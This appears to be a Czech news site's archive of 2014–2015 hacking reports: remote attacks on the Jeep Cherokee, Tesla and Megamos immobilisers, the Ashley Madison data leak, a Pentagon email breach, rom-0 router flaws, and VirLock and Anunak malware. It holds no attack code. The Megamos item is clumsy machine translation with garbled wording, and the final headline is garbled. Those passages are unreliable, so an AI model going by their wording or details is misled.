Nejnovější cíl hackerů? Připojená auta. Hacknout jdou už i na dálku

26.8.2015 Hacking

Přinejmenším někteří výrobci připojených aut fatálně podceňují otázku bezpečnosti a ochrany před hacknutím systémů. Poučí se z prvních hacků?
Nejbezpečnější je z hlediska kybernetických hrozeb počítač, který není připojený k internetu (a nepoužívají se na něm žádná přenosná média). Stejné pravidlo platí i pro připojená auta a jejich počítače – jakmile umožníte přístup k řídícím jednotkám přes mobilní datové sítě, hraje dobré zabezpečení klíčovou roli.

Připojené auto nabízí řadu výhod – počínaje možnostmi jako je vzdálená diagnostika, provozní statistika, nástroje pro zlepšování stylu jízdy, sledování nákladů a v neposlední řadě i bohatší možnosti zábavy například v podobě streamovaného audia. Integrace chytrých telefonů v kombinaci s daty o plynulosti dopravy přivádí možnosti satelitní navigace na novou úroveň – konečně je možné se husté dopravě skutečně vyhýbat (je-li kudy, pochopitelně) a sledovat vývoj dopravní situace takřka v reálném čase.

Nezbytnou daní za tyto výhody je pochopitelně jistá míra ztráty soukromí – na tu ale většina z nás už dávno přistoupila při používání chytrého telefonu a aplikací Googlu, Microsoftu či Applu. Je to oběť, kterou řada uživatelů – řidičů ochotně položí na oltář pohodlí. A dost možná zajdou ještě dál a nechají data o své jízdě sbírat například pojišťovnu pro získání bonusové slevy.

Jenže kromě obětí přijatelných se mohou objevit i ty nepřijatelné – ukazuje se, že přinejmenším někteří výrobci připojených aut fatálně podceňují zejména otázku bezpečnosti a ochrany před hacknutím systémů, včetně možnosti ovlivnit základní a životně důležité funkce vozidla.

Hacknutelná síť počítačů na kolech

Že rostoucí počet připojených aut dříve či později přinese první úspěšné hacknutí na dálku bylo jasné a v posledních měsících a letech na to upozorňoval bezpočet článků – byla to jen otázka času. Ten nastal před měsícem – 21. července publikoval Andy Greenberg na portále Wired článek o tom, jak se dvojice hackerů ze St. Louis, Charlie Miller a Chris Valasek, nabourala v čemsi na způsob řízeného experimentu (ovšem v běžné dopravě) do systémů Jeepu Cherokee, který řídil.

Jeep Cherokee
Nebylo to poprvé, kdy se Greenberg věnoval s Millerem a Valaskem podobné tématice. Již o dva roky dříve, v srpnu 2013, publikoval v časopise Forbes článek o svém zážitku z hackování Fordu Escape a Toyoty Prius. Nejednalo se ale o průlomy provedené bezdrátově a na dálku – šlo o hacky prováděné pomocí notebooku připojeného přímo na diagnostický port (nicméně s pomocí bezdrátového OBD II konektoru by je jistě šlo provést i na dálku, vyžadovalo by to ale „vloupání“ do cílového vozu).

I tak bylo tehdejší skóre Valaska a Millera slušné. Fordu Escape odstavili brzdy, Priusu dokázali naopak brzdy zablokovat (i ve vysoké rychlosti) plus provádět řadu dalších méně i více nebezpečných nepříjemností jako je náhodné spuštění klaksonu, vypnutí posilovače řízení, zmatení GPS, ovlivnění přístrojové desky, a dokonce i náhlé strhnutí volantu ke straně.

Toyota Prius 2012
Zajímavé je, že tento výzkum obou „hackerů“ nefinancoval nikdo jiný než armádní agentura DARPA, a to grantem ve výši 80 tisíc dolarů. Je to pochopitelně táž DARPA, jíž vděčíme – díky motivaci v podobě „velkých výzev“ z minulého desetiletí – za rychlý posun ve vývoji technologií pro autonomní vozy, kterým jsme se věnovali v minulém díle.

Valasek a Miller v roce 2013 otázku vzdáleného hackování připojených aut neřešili jednak proto, že se zaměřili na to, nakolik dokáží systémy v dnešních automobilech odolat reverse engineeringu a zda tedy je nebo není možné převzít nad současnými auty kontrolu. Na otázku bezdrátového přístupu se ale nezaměřili také proto, že už o tři roky dříve dokázali autoři výzkumu z universit v San Diegu a Washingtonu, že to v případě řady systémů vybavených mobilním připojením pro asistenční služby a zákaznickou podporu (tehdy dostupným hlavně ve vyšších modelových řadách vozů) možné je.

Ve zprávě, kterou publikovala americká TSB, se konstatuje, že bylo možné překonat zabezpečení mobilního datového připojení a nakonec získat i přístup k řídící jednotce ECU a znefunkčnit nebo naopak zablokovat například brzdy. Jak poznamenávají Miller s Valaskem, auto není jen hromada oceli a gumy, je to také pohybující se síť propojených počítačů – které jsou stále častěji připojené k internetu a v některých případech asi i dost slabě zabezpečené.

Digitální únos v praxi

Případ carjackingu Jeepu Cherokee byl jiný v jedné podstatné drobnosti – k úspěšnému útoku na auto totiž stačilo znát jeho IP adresu a poměrně snadno přístupnou slabinu v zábavním systému Uconnect. Její podrobnosti zveřejnili oba „útočníci“ před pár týdny na konferenci Defcon – jednalo se podle všeho o otevřený port, jehož prostřednictvím bylo možné přistoupit k procesu, který umožňoval spuštění programového kódu. Touto cestou provedli Miller s Valaskem injektáž několika řádků Pythonu a získali tak root práva. Opět s pomocí zpětného inženýringu se dostali až k řídícím jednotkám.

Uconnect
Výsledkem bylo auto, kterému útočníci na dálku nejen ovládali klimatizaci a další prvky v kabině, vyřadili z provozu automatickou převodovku či odstavili brzdy. Dokonce mohli převzít i kontrolu nad řízením – jak ale Greenberg ve svém článku pro Wired poznamenává, jen když byla zařazena zpátečka.

V době vydání původního článku se zdálo, že se problém týká „jen“ bezmála půl milionu vozidel, která měla nainstalován systém Uconnect, nakonec ale bylo zpět do servisů pro softwarovou záplatu povoláno na 1,4 milionu vozů. Připojená auta si tak prošla prvním ohněm digitálního recallu – naštěstí se to, na rozdíl od řady jiných případů, prozatím obešlo bez havárií, zranění nebo obětí.

A co na to nejpřipojenější auto?

Pokud byste hledali auto, pro které je „připojenost“ stejně důležitá jako prakticky kterákoliv z dalších jeho funkcí, dříve či později byste se zastavili u jediného aktuálního modelu Tesla Motors – S. Je to auto, které dohledové centrum výrobce monitoruje prakticky neustále a dokonce do něj může na dálku nahrávat i aktualizace firmwaru pohonné jednotky a dalších systémů.

Tesla je pro hackery vděčným cílem a věnovala proto otázkám zabezpečení nejspíš více pozornosti než ostatní výrobci. Přesto byla počátkem tohoto měsíce poražena jinou dvojicí bezpečnostních expertů – Kevinem Mahafeyem a Marcem Rogersem. Ti v rámci letošního Defconu předvedli nejen, že umí na dálku vozidlo neautorizovaně odemknout, nastartovat a následně s ním odjet, ale také zvládli zadat příkaz, který odstavil všechny systémy ve vozidle a zastavil jej – ale jen při velmi nízké rychlosti.

Tesla Model S
Na jejich prezentaci bylo podle Antuana Goodwina z Cnetu nejzajímavější to, že se většinu času věnovali tomu, jak důkladně jsou systémy Tesly zabezpečeny a jak obtížné bylo nějakou skulinu vůbec najít. Auto si koupili z druhé ruky a následně rozebrali celou palubní desku – nepodařilo se jim získat přístup ani přes USB port, ani přes browser QtWebKit – ten sice měl nedávno díry, Tesla je ale důsledně zalátala.

Na jedné z ukrytých SD karet nalezli digitální klíče pro startování auta, které se posléze ukázaly užitečné. Branou k systému se nakonec ukázal být proprietární ethernetový port, k němuž si postavili redukci a díky ní se dostali do VPN sítě Tesly, odkud si mohli stáhnut firmware vozu.

Spíše než ten jim ale pomohla nezašifrovaná hesla, mezi kterými bylo mimo jiné i statické heslo pro WiFi v servisech Tesly. Díky této kombinaci slabin se jim podařilo ovládnout palubní zábavní systém a funkce, které jsou přístupné přes jeho API – ty nicméně neumožní provést žádný skutečně nebezpečný zásah (odstavení systémů není při rychlosti nad 5 mil v hodině touto cestou možné).

Tesla S tedy prozatím víceméně odolala a ostatní výrobci se, doufejme, z kauzy koncernu Fiat Chrysler poučili. Připojených aut totiž bude přibývat – a díky systémům jako je eCall a nástupu částečně či plně autonomních vozů se časem stanou standardem. S nástupem autonomních aut ale souvisí jiná, pro milovníky volantu a řadicí páky mnohem děsivější změna: že totiž dříve (za 10 let) či později (15–20 let) přijde okamžik, kdy začne být lidem řízení aut postupně zakazováno.

Pokud tedy řídíte rádi, máte možná posledních 10 až 15 let, abyste si to užili. Třebas v nějakém novém připojeném autě.


Bezpečnostní nedostatky by mohla umožnit útočníkům odcizit více než 100 různých vozidel
25.8.2015 Hacking
Od roku 2012, trojice evropských výzkumných pracovníků věděl, že Megamos Crypto transpondér - používá se v více než 100 automobilů vyrobených od Audi, Ferrari, Fiat, Cadillac, Volkswagen a dvě desítky dalších automobilek po celém světě - sportovní zabezpečení, které mohou být zneužity útočníky spustit auta, aniž byste museli mít klíč (tj pasivní RFID tagu vložené do ní).

Podařilo se jim zpětné inženýrství veškerá vlastnická bezpečnostní mechanismy na transpondéru, včetně šifry a ověřovací protokol, a vymysleli tři praktické útoky, které jim umožnilo získat zpět 96-bit transpondér tajný klíč. Jedna z těchto útoků jim umožnilo obnovit klíč a nastartujte motor s transpondér emulovat zařízení v jen půl hodiny. A další je velmi těžké zmírnění v případě, že útočník má přístup k oběma vozu a transpondéru po určitou dobu (např, půjčovna aut, Parkování s obsluhou). "Je také možné předvídat nastavení se dvěma pachateli, jeden interakci s auto a jeden bezdrátově kapesních krádeží auto klíč z kapsy obětí, "oni poznamenal. "Naše útoky vyžadují úzkou range bezdrátovou komunikaci jak s jednotkou imobilizéru a transpondéru." Tak, jak to, že jsme jednání o tomto problému teprve teď? No, když výzkumníci poprvé pokusili prezentovat své výsledky na 22. USENIX zabezpečení sympozium 2013 oni byli předešel od dělání tak Volkswagen, který je vzal k soudu a vyhrál soudní příkaz britským High Court of Justice zakazující jim od zveřejnění klíčových úsecích papíru. O dva roky později, soudní příkaz byl zrušen, a oni konečně měl možnost prezentovat svou práci na na 24. USENIX zabezpečení sympozium se konalo minulý týden v Austinu, Texas. "I když dva roky uplynuly, tato práce je stále důležité a relevantní pro naši komunitu," Sam Král, USENIX Security '13 Program Chair, a Casey Henderson, USENIX výkonný ředitel, poznamenal v předmluvě přidává do papíru, který byl změněn, aby vynechat klíčovou větu, která by mohla pomoci netechnické útočníci vymyslet, jak vykonávat útoky. "Je to skvělý příklad toho, co se stane, když budete mít rozhraní, které bylo navrženo pro místní přístup a připojit jej k širšímu internetu, "komentoval Good Technology CTO, Nicko van Someren." Stále častěji, ve spěchu, aby připojení "Věci" pro internet věcí, zjistíme, zařízení, která byly navrženy s očekáváním řízení fyzického přístupu k připojení k Internetu, Cloud a mimo ni. V případě, že bezpečnost této souvislosti selže, pak řetězové účinky mohou být katastrofální a potenciálně dokonce fatální. "Car hacking stala obzvláště horké téma v poslední době, jak výzkumníci bezpečnostní obrátili své zraky na testování automobilových počítače pro zranitelnosti. Na počátku tohoto roku BT již zahájila novou bezpečnostní službu vyvinutou pro testování expozice připojených vozidel na počítačové útoky a pomáhají všechny subjekty na trhu vyvíjet bezpečnostní řešení, a iniciativy, jako já jsem kavalérie jsou povzbudivé automobilový průmysl, aby se zavázaly k bezpečnosti počítačových sítí.


Ashley Madison nabízí za dopadení hackerů půl milionu dolarů

25.8.2015 Hacking

Seznamka pro nevěrníky Ashley Madison nabízí odměnu ve výši půl milion dolarů (11,7 milionů korun) za informace vedoucí k dopadení hackerů, kteří nedávno napadli její servery a po počátečních výhrůžkách skutečně umístili na internet kompletní databázi s registrovanými uživateli, zdrojové kódy služby a další interní data. Útok se tak svou velikostí a úspěšností podobá loňské krádeži dat ze serverů Sony.

Seznamka pro nevěrníky Ashley Madison je lokalizovaná do hromady jazyků včetně češtiny a slibuje naprosté soukromí. Zdá se, že sliby příliš neplní...
Jelikož se data potulují na internetu (zpočátku především skrze Tor), snaží se je sekundárně zneužít hromada dalších záškodníků. E-mailové adresy obětí se tedy okamžitě dostaly na všemožné spamové seznamy a jiní vykukové jim zase rozesílají e-maily, že si za poplatek mohou zjistit, jestli jsou na seznamu, případně jestli se je na seznamu pokusil vyhledat někdo blízký – typicky manželka (a manžel). Internetem se také šíří zkazky o tom, že již někteří odhalení záletníci spáchali sebevraždu, přestože tyto případy policie teprve vyšetřuje.


Co znamená, že něčí e-mail je v hacku Ashley Madison?

20.8.2015 Hacking

Senzace je na světě, v mailové databázi Ashley Madison najdete politiky, úředníky, šéfy firem, převážně muže, ale nechybí ani ženy. Co s tím?
V 36 milionech e-mailů v databázi účtů uniklých hackem Ashley Madison (viz Kompletní data ze seznamky Ashley Madison jsou na internetu) je 25 225 těch, které mají koncovku .cz.

Když si je rozklíčujete podle domén, získáte hodně dlouhý seznam, kterému ale vládne seznam.cz (ve správně napsané podobě, ale také v záplavě překlepů). Na počátek tabulky domén a počty e-mailů z nich se ostatně můžete podívat v následujícím zlomku výsledné tabulky (doplněné o žebříček z celku).

Doména Počet Doména Počet
seznam.cz 17034 gmail.com 8774873
centrum.cz 2654 yahoo.com 6623069
email.cz 2532 hotmail.com 6243883
post.cz 1087 aol.com 1253878
atlas.cz 503 live.com 471354
volny.cz 359 yahoo.com.tw 369437
tiscali.cz 131 almlabs.com 343824
hotmail.cz 37 qq.com 327122
quick.cz 33 outlook.com 297853
klikni.cz 31 naver.com 282926
Co znamená, že něčí e-mail je v hacku Ashley Madison?

V zásadě to může znamenat, že byl skutečně tak nezkušený (můžete říci i hloupý), že se do „seznamky“ určené k podvádění partnerů zaregistroval se skutečným mailem. Často i firemním mailem, nebo dokonce mailem z úřadu či státní instituce. Jedno ze zásadních opatření pro podobné služby samozřejmě je, že si založíte nový e-mail někde na free-mailu. A rozhodně ho nepojmenujete například jmeno.prijmeni23@seznam.cz.

Pro „seznamky“ a „sociální sítě“ je navíc charakteristické, že často zakládají účty i lidem, kteří to vůbec netuší, a používají záplavy praktik (viz třeba staré a známé Badoo) hodně za hranou seriózního podnikání. Nevíme, jestli stejně postupovali na Ashley Madison, ale víme, že pokud chceme brát vážně e-maily v jejich databázi, je nutné tuto možnost zvažovat.

Ashley Madison jsou navíc ignoranti nejenom v bezpečnosti, ale vůbec se nezdržovali nějakým potvrzováním zadaných mailových adres – vzorek .cz mailů to ostatně dokládá dost jasně.

Kdyby maily ověřovali, museli by ty stovky mailů s neexistující doménou prostě z databáze vyřadit. Tady je vhodné připomenout, že ověření mailu hlavně mělo znamenat, že při registraci na zadaný mail měli poslat žádost o potvrzení založení účtu (to nedělali). Asi by nemělo být až tak těžké kontrolovat doménu, protože pak se rovnou dá předejít té záplavě překlepů.

Pomsta a další důvody

Charakteristické pro jakékoliv seznamky je to, že si na nich zakládají účty podvodníci. V Ashley Madison tak najdete záplavu účtů s maily nashromážděnými z internetu, doplněnými o fotografie z fotobank nebo také nakradenými z internetu (stejně jako v dalších seznamkách i sociálních sítích). Často pocházejí z Ruska, což je také jedna z charakteristik „internetového seznamování“. Prostě „ruské nevěsty“ jsou legendární.

Nestačí vám to? Pak je tu samozřejmě další méně častá alternativa, že někdo někomu založil účet v Ashley Madison z důvodu pomsty. Pokud tam najdete pedagogy (a najdete), tak je to jeden z velmi pravděpodobných důvodů. Ale běžné je to i jako pomsta pro „ex“ a podobných důvodů se najde řada.

Celé je to nakonec zábavné i v tom, že třeba Forbes píše „nejvíce šokující je odhalení, že se našly tři účty s @vatican.com adresou“. Velmi pravděpodobně autora článku vůbec nenapadlo nic z výše napsaného. Mohlo ho trknout to, že jde ve skutečnosti o tři výskyty pope@vatican.com. Ale asi pro něj bylo moc složité se podívat.

Internetové seznamky málokdy podnikají čistě

K Ashley Madison je navíc nutné dodat, že jsou natolik vychytralí, že smazání účtu podmiňují zaplacením peněz (a vynášelo jim to, tedy pokud můžeme věřit tomu, co se píše v zahraničních médiích). Takže pokud se tam objevil váš falešný účet, měli jste prostě smůlu a bez zaplacení výpalného nebyla šance na jeho smazání. A jak hack ukázal, ačkoliv si za mazání nechávali platit, data si v databázi stejně nechávali.

Výše uvedená tabulka je tedy pouze pohled na e-maily bez hlubšího významu, 25 tisíc z 38 milionů jich má prostě doménu .cz a je zajímavé sledovat, jak jsou rozděleny mezi jednotlivé free-mailové služby. Nic to neříká o tom, jestli si 17 tisíc lidí z Česka na Ashley Madison založilo účet s použitím free-mailu Seznamu – protože i tady může jít o spammery nasbírané maily a podvodně vytvořené účty.

Pokud byste chtěli zjistit, jestli byl daný účet skutečně používaný a není falešný, museli byste jít do dalších uniklých dat a zjišťovat, co ještě se o daném účtu ví, zda za něco platil (podle nejnovějších informací nejsou v uniklých datech kompletní čísla kreditních karet, což ale neznamená, že je hackeři nemají), odkud přistupoval a podobně.


Dali jsme na síť údaje o miliónech klientů erotické seznamky, hlásí hackeři

19.8.2015 Hacking
Hackeři, kteří vystupují pod názvem Impact Team, poslali na skryté servery několik gigabajtů dat, která podle nich obsahují údaje o uživatelích mezinárodní seznamky Ashley Madison. Ta slouží k rychlému seznámení a sezdaným k nalezení milostného poměru. Skupina akci ospravedlňuje morálním zájmem.
Jak fungují skryté servery
Skryté servery nejsou pro běžné uživatele volně přístupné. K přístupu na ně je nutný speciální internetový prohlížeč Tor Browser. Jeho použitím získají uživatelé nejen přístup na skryté servery, ale zároveň také jistotu anonymity.
Skryté servery jsou často používány k provozování široké plejády nelegálních aktivit, od šíření návodů na výrobu různých nelegálních chemických látek až po šíření dětské pornografie. Vzhledem k povaze této sítě je totiž velmi obtížné někoho chytit a obvinit.
Nabízí se otázka, proč nejsou skryté servery na internetu blokovány. Jsou totiž důležité a užitečné například pro občany v nedemokratických režimech, kterým umožňují anonymně komunikovat a vyjadřovat na internetu své názory bez obav z postihu.
Skupina Impact Team podle serverů Wired či Ars Technica odeslala na síť 9,7 gigabajtu dat, která mají obsahovat e-mailové adresy přihlášených uživatelů, jejich profily, erotické preference či detaily o platbách kreditní kartou. Impact Team podle svého tvrzení odeslal tyto údaje na skryté servery, které jsou často využívány jako platforma k nelegálním aktivitám, jako je prodej zbraní či drog, a nejsou běžně přístupné.

Důvodem odeslání dat je podle hackerů fakt, že mateřská společnost Avid Life Media seznamku Ashley Madison a jí podobnou Established Men neuzavřela, přestože útok na první zmíněnou byl oznámen už před měsícem. [celá zpráva]

Seznamka, jež má po celém světě 37 miliónů klientů, podle útočníků, kteří se pasují do role obránců morálky, umožňuje nevěru a korupci. Její uživatelé si údajně anonymitu nezaslouží, protože jsou „nevěrnými špinavci.“

Adresy z Vatikánu i OSN
Z odeslaných údajů vyplývá, že k seznamce přistupovali uživatelé i prostřednictvím e-mailů z vatikánských adres či adres OSN. Mají mezi nimi být i bankéři či úředníci z Británie i USA.

Skupina uvedla, že mnoho uživatelských profilů je falešných a že 90–95 procent z nich jsou ve skutečnosti muži. Podle ní také Avid Life Media nedostála svému ujištění, že za poplatek trvale smaže nežádoucí profily, ty jsou prý stále dohledatelné.

Avid Life Media útok hackerů na seznamku potvrdila a uvedla, že na odhalení útočníků spolupracuje s policií. Odeslání dat komentovala pouze citací prohlášení Impact Teamu.


A další úspěšný útok na automobil. Tentokrát pomocí SMS

12.8.2015 Hacking

Na sklonku července prolétla internetem zpráva o úspěšném hackerském útoku na automobil Jeep Cherokee s palubním počítačem Uconnect připojeným k internetu. Chrysler poté musel svolat 1,4 milionu vozů k servisní aktualizaci firmwaru.

Rozhodně se nejednalo o ojedinělý případ, několik málo týdnů poté se totiž svým kouskem pochlubili i specialisté z Kalifornské univerzity v San Diegu. Na konferenci Usenix demonstrovali úspěšný útok na automobilový diagnostický systém CAN skrze GSM modul a běžné zprávy SMS. Svoji techniku ukázali na Chevroletu Corvette vybaveném všem potřebným.

Vůz se sběrnicí CAN byl vybavený telefonním modulem pro potřeby pojišťovny, jejíž operátorka pak může jednoduchým příkazem v případě potíží poslat do vozu třeba příkaz k okamžitému zastavení (třeba v případě infarktu řidiče, kdy spolujezdec stiskne tlačítko asistenčního alarmu aj.). Inženýři tedy použili podobnou techniku a posílali do vozu vlastní zprávy.


Rusové hacknuli e-mailový systém Pentagonu

10.8.2015 Hacking
Rusové hacknuli e-mailový systém Pentagonu7.8.2015, Milan Šurkala, aktualitaAmeričané to se zabezpečením nemají lehké, letos už byl poněkolikáté hacknut nějaký jejich systém. Tentokrát zaútočili Rusové a nabourali se do e-mailového systému Pentagonu. Ten byl raději dočasně vyřazen z provozu. Letos si americké úřady užili už několik útoků na své systémy. Patrně Číňané stáli za útokem, který měl znamenat zcizení dat 4 milionů zaměstnanců americké vlády. Nakonec se ukázalo, že se to týkalo 21,5 milionu osob(!) a zatím nebylo potvrzeno, odkud útok směřoval. Syřané zase napadli webové stránky americké armády. Nyní to byli pro změnu Rusové, kdo napadli e-mailový systém Pentagonu a nabourali se do elektronické pošty 4000 vojenských i civilních zaměstnanců.

Útok se měl odehrát 25. července a od té doby Pentagon tento systém odstavil, aby nebylo napácháno ještě více škod a mohl celou záležitost vyšetřit. Zatím není jasné, zda za útokem stojí ruská vláda nebo jen skupina lidí z Ruska. Útočníci se nedostali k tajným e-mailům a systém by měl být zprovozněn do konce tohoto týdne.


V Česku jsou stále stovky ohrožených routerů

7.8.2015 Hacking
V České republice bylo v uplynulém roce zaznamenáno několik útoků na počítačové routery – brány do světa internetu. Kyberzločinci při svých nájezdech využili zranitelnosti známé jako „rom-0“. Podle analýzy Národního bezpečnostního týmu CSIRT.CZ počet napadnutelných přístrojů v tuzemských domácnostech neustále klesá, stále jich však jsou stovky.
Ještě v polovině května loňského roku trpěl chybou více než milión routerů po celém světě, z toho více než pět tisíc jich bylo v Česku. Už o tři měsíce později ale klesl počet napadnutelných přístrojů v globálním měřítku pod milión a na méně než čtyři tisíce v tuzemsku.

A tento trend pokračuje i v letošním roce, i když situace ani zdaleka není tak růžová, jak by se na první pohled mohlo zdát. „Od prvotního kontaktu s chybou ‚rom-0‘ a od našeho prvního měření v květnu 2014 do posledního v červenci 2015 klesl v ČR počet napadnutelných boxů z 5368 v květnu 2014 na současných 1561. Pokles je tedy o necelých 71 %,“ uvedl Tomáš Hlaváček, programátor a výzkumník sdružení CZ.NIC, které provozuje národní bezpečnostní tým CSIRT.

Stejný trend je patrný také ze světových statistik. „Ve světovém měřítku byl pokles z 1 225 514 (květen 2014) na současných 330 397, což je 73 %,“ doplnil Hlaváček.

„Existují však i ojedinělé regiony, kde naopak došlo k přírůstku napadnutelných zařízení. Nejedná se ale naštěstí o velká čísla a výskyt nových napadnutelných boxů lze připsat výprodeji skladových zásob routerů se starým firmwarem a jisté lehkovážnosti či neznalosti,“ uzavřel programátor a výzkumník sdružení CZ.NIC.

Útočník může přesměrovat adresy
Otestovat bezpečnost routeru je možné na webu rom-0.cz. Na zmiňovaných stránkách stačí kliknout na tlačítko Test, vše ostatní běží automaticky. Během necelé minuty pak program vyhodnotí, zda router mohou zneužít kyberzločinci.

Na webu rom-0.cz stačí kliknout na tlačítko Test, vše ostatní běží automaticky.
FOTO: Novinky

Všichni lidé, kteří používají síťové prvky s touto chybou, jsou v ohrožení. Pokud se útočník dostane k administračnímu rozhraní jejich routeru, může snadno přesměrovat adresy. Místo serverů Seznam.cz nebo Google.com se poškozeným zobrazí hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhne virus.


Hackeři u Jeepu Cherokee na dálku otáčeli volantem a vyřadili brzdy

23.7.2015 Hacking
Stále více automobilů umožňuje posádce připojit se k internetu. A to může být u špatně zabezpečeného auta obrovský problém. Redaktor magazínu Wired společně se dvěma hackery ukázal, jak lze auto na dálku zcela ovládat.
Jeep Grand Cherokee
Experti Charlie Miller a Chris Valasek rok zkoumali, zda systém Uconnect, který používají automobily Fiat Chrysler, obsahuje bezpečnostní chyby. Chvíli to trvalo, ale nakonec se jim podařilo dostat se na dálku nejenom do multimediálního systému, což by ještě bylo úsměvné, ale také ke všem řídicím jednotkám. A mohli tak zcela ovládat všechny funkce auta.

Přesvědčil se o tom redaktor amerického časopisu Wired. Nejdříve mu oba experti jenom vypnuli klimatizaci nebo zvýšili hlasitost rádia, pozdější zásahy už ale mohly ohrozit bezpečnost řidiče a dalších lidí v okolí.

Nebyl totiž problém autu na dálku snížit výkon, vypnout a znovu nastartovat motor, točit volantem nebo vyřadit z provozu brzdy. A to je ohromný problém. A přitom hackerům stačilo zjistit IP adresu, skrz kterou bylo napadnuté auto připojeno k internetu.

Miller i Valasek hodlají nechtěné dálkové ovládání auta popsat v srpnu na konferenci Black Hat v Las Vegas. Nutno říci, že oba experti se zachovali velice zodpovědně. Na samotný problém upozornili koncern FCA měsíce dopředu, takže automobilka mohla vydat „bezpečnostní záplatu”. I tak je to ale velmi znepokojivé.


Miliónový byznys posunuli vyděrači o úroveň výš. Vydělávají na důvěřivcích

26.12.2014 Hacking
Červy z rodiny ransomware jsou pro podvodníky doslova zlatý důl. Na důvěřivcích díky nim vydělávají milióny. Nyní tuto hrozbu posunuli ještě o úroveň, dokáže se sama rozmnožovat. To je i jeden z důvodů, proč je velmi složité odstranit jej z napadeného systému. Upozornil na to server Security Affairs.
VirLock se stejně jako další hrozby z rodiny ransomware schovává pod hlavičku ochránců zákona.
Nového červa pojmenovali bezpečnostní experti jako VirLock. „VirLock je plnokrevný ransomware, který uzamkne obrazovky svých obětí,“ uvedli výzkumníci z antivirové společnosti Eset.

Nezvaný návštěvník působí jako parazitní virus, který napadá uložené soubory na pevném disku. Dokáže je zašifrovat, aby se k nim uživatel nedostal ani po jeho odinstalování, pokud uživatelé zjistí, že jde skutečně o hrozbu.

Podvodná zpráva vypadá, jako by ji odeslali zaměstnanci FBI

Podvodná zpráva vypadá, jako by ji odeslali zaměstnanci FBI

VirLock se totiž stejně jako další hrozby z rodiny ransomware schovává pod hlavičku ochránců zákona. Při zapnutí počítače zobrazí zprávu, že počítač zablokovaly policejní úřady nebo bezpečnostní složky kvůli používání nelegálního softwaru. A k jeho odblokování je nutné zaplatit „výkupné“.

Starý trik, ale funguje...
Přestože první verze ransomwaru se objevila už před několika lety, stále se na tento trik nechají nachytávat tisíce lidí po celém světě. Vzhledem k tomu, že za odblokování počítače piráti požadují 100 dolarů (2000 Kč), vyšplhá se ve výsledku „výkupné“ až na několik stovek tisíc korun denně.

Kolik si jsou hackeři schopni vydělat za jediný den, odhalila již dříve ve svých statistikách antivirová společnost Symantec.

Ke svým datům se lidé nemusejí dostat ani po zaplacení výkupného.
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. To ale není v případě VirLocku vůbec jednoduché, protože vytváří na pevném disku unikátní instalace, čímž se snaží znesnadnit možnost odstranění ze systému.

Není navíc vyloučeno, že v budoucnu se objeví ještě sofistikovanější verze této hrozby. Replikační schopnosti by mohli kybernetičtí zločinci využít k šíření této hrozby po internetu, například prostřednictvím adresáře v e-mailu.

Vyděrači cílí i na mobily
VirLock se v současnosti zaměřuje výhradně na klasické počítačové systémy. Letos v červnu ale bezpečnostní experti odhalili vyděračský virus, který cílil také na chytré telefony.

Nezvaný návštěvník nazývaný Simplocker se podle analýzy bezpečnostních expertů ukrýval v aplikaci Sex xionix pro přístroje s operačním systémem Android. Nutno podotknout, že tento program se nenacházel v legitimním obchodě Google Play, ale na neoficiálních zdrojích, především nejrůznějších internetových fórech.

Vzorek odhalený v aplikaci Sex xionix komunikuje s uživateli rusky, výkupné má být zaplaceno v ukrajinských hřivnách. Pokud lidé v přepočtu téměř 500 Kč zaplatí, nemají žádnou jistotu, že jejich data budou skutečně zpřístupněna, stejně jako v případě verze pro klasické počítače.


Skupina hackerů Anunak ukradla z bank přes půl miliardy korun

23.12.2014 Hacking
Sofistikovaná skupina hackerů Anunak ukradla přes pětadvacet milionů dolarů (přes půl miliardy korun) z několika bank v Rusku a zemích bývalého Sovětského svazu.

Se zjištěním přišli experti z bezpečnostních společností Group-IB a Fox-IT, kteří hackerskou skupinu pojmenovali jako Anunak po červu, který ke svým útokům využívá. Narozdíl od většiny jiných hackerských skupin, kteří se zaměřují na samotné spotřebitele,Anunak cíli na samotné instituce, když proniká do jejich interních sítí a na jejich servery. Díky tomuto přístupu byli útočníci schopni převést si peníze na účty, které mají pod vlastní kontrolou a v některých případech ovládli i bankomaty, z nichž si peníze jednoduše vybrali.

„Od roku 2013 získali přístup k sítím více než padesátky ruských bank a pěti platebním systémům a dvěma z těchto institucí byly kvůli tomu zrušeny jejich bankovní licence,“ uvedl Group-IB včera v oficiálním prohlášení. „K dnešnímu dni celkem ukradli přes miliardu rublů (okolo pětadvaceti milionů dolarů), přičemž většina z této částky byla ukradena v druhé polovině roku 2014.“

Útočníci ze skupiny Anunak začínají infikací počítačů běžných zaměstnanců červem, který jim následně otevře dveře do interních sítí. Útočníci používají síťové skenery, keyloggery, SSH backdoory, aplikace pro vzdálenou kontrolu a penetrační testovací framework Metasploit.

Jejich primárním nástrojem však je trojský kůň známý jako Anunak, který je založen na červovi Carberp, jenž slouží ke kradení přihlašovacích údajů do bankovnictví. Zdrojový kód Carberpa unikl na internet v červnu 2013. Group-IB věří, že někteří členové Anunaku dříve patřili do "gangu" Carberp, který se v roce 2013 rozpadl kvůli interním konfliktům.

Útočníci využívají k infikaci počítačů trojanem Anunak řadu metod. Pomocí expolitů zneužívají legitimní stránky, z nichž se následně červ stahuje (podle expertů například v roce 2013 dokázali integrovat nebezpečný kód do webu php.net), ale používají také klasický phishing pomocí e-mailů, kdy se zprávy tváří jako by byly odeslány z ruské centrální banky.

„Tato skupina má úzké styky s vlastníky některých velkých botnetů, které masivně distribuují červy,“ uvedli experti z Group-IB. „Útočníci si kupují od těchto vlastníků botnetů informace o IP adresách počítačů, které jsou v rámci botnetu ovládány a následně zjišťují, zda nepatří nějaké finančí instituci nebo vládní organizaci. Pokud narazí na počítač umístěný v bance, zaplatí vlastníkovi botnetu za to, aby si na něj mohli nainstalovat vlastního červa.“


Podvodníci používají falešné výpisy produktu ukrást z Walmart
6.12.2014 Hacking
